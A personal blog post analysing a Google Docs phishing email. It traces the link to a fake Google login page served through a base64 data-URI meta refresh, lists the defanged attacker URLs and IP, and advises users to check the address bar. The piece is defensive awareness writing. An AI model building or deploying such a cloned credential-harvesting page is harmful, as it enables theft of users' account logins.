Google docs phishing Email analysis

Recently I received an email claiming one of my friend have shared an important Google doc with me and asked to click the attached link to access it. I have turned off the html view in my email client, and thus I was easily able to see the link, unsurprisingly it was neither of Google Drive nor of  any other Google products.

The link simply redirects user to an imposter Google account login page. If the user gets trapped, he might end up giving away their Google login details to the attacker. Further analysis is below.

The attached link  in the email is: hxxp://zhangjiancheng.com/include/read.php, which resolves to IP 66.212.29.178, hosted by Secured Private Network, Santa Ana, CA.  On clicking the above link, response contains a HTML page with <META http-equiv=”refresh” content=”0;URL=data:text/html;base64, tag and the content of the page Base64 encoded. On decoding the content and doing a diff with original Google account login page, it shows that the only major change is the URL where the form data is to be submitted, in this case it is hxxp://zhangjiancheng.com/include/other.php. To test further, I entered fake details in the username and password field and submitted. I was served with a Google Drive page stating the file requested does not exist.

Google Drive Redirect page
Google Drive page served after entering login details.

Such spam emails highlight the fact that most users do not check the address bar of the browser. In the snapshot below it can be clearly observed that the address in the address bar is not of Google Accounts and should raise an element of doubt. Checking the URL in the address bar can save you from such phishing attacks.

Login Page
Fake Google login page. Check the address bar.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s